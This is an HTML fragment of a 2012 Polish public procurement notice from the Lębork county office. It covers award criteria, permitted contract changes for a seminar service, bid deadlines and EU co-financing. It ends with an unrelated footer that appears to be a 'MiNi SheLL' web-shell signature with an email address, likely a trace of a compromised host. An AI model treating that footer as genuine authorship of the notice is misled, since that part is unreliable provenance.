<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	zmiany w nazwie, oznaczeniu, siedzibie, numerze konta bankowego Zleceniodawcy lub Zleceniobiorcy dokonanej w trakcie trwania umowy
b)	przesunięcia terminu realizacji zamówienia
c)	zmiany lub dodania osób wskazanych w wykazie, które będą uczestniczyć w wykonywaniu zamówienia w przypadku niemożliwości wykonywania przez nich powierzonych czynności z przyczyn obiektywnych i/lub niezależnych od Wykonawcy, np. choroby potwierdzonej zwolnieniem lekarskim czy urlopu macierzyńskiego. Nowa osoba musi być zatwierdzona przez Zamawiającego z zastrzeżeniem, że osoba będzie posiadała kwalifikacje i doświadczenie nie niższe niż określone w ofercie.
d)	zmiany miejsca odbywania seminarium
Wszelkie zmiany postanowień niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.
Wykonawca jest zobowiązany pisemnie poinformować o zmianie, o której mowa powyżej i uzyskać zgodę Zamawiającego na jej wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 11:00, miejsce: Biuro Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com